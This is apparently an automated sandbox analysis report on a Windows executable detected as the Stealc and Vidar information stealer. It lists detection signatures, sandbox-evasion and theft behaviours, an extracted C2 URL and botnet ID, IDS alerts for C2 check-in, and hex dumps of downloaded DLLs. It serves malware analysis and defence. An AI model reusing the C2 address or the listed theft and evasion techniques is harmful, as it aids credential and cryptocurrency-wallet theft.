Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1544234
MD5: 82ffb0d94c7f912b03d1feee6f614605
SHA1: f84ef7a098210160537648584909d6cd4f7cb6cb
SHA256: 1f4559c2464e25078e6f0ae6b99990b6607c5adc0d631d43ba380ae7de51f0c1
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: 0.2.file.exe.350000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 0.2.file.exe.350000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C516C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C516C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2100928308.000000006C57D000.00000002.00000001.01000000.00000011.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1730489786.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101541267.000000006C801000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp, chrome.dll.0.dr
Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1730489786.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2101541267.000000006C801000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000000.00000002.2080967365.000000000037C000.00000040.00000001.01000000.00000003.sdmp, chrome.dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2101203406.000000006C73F000.00000002.00000001.01000000.00000010.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2100928308.000000006C57D000.00000002.00000001.01000000.00000011.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 8MB later: 41MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:29 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 29 Oct 2024 03:52:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 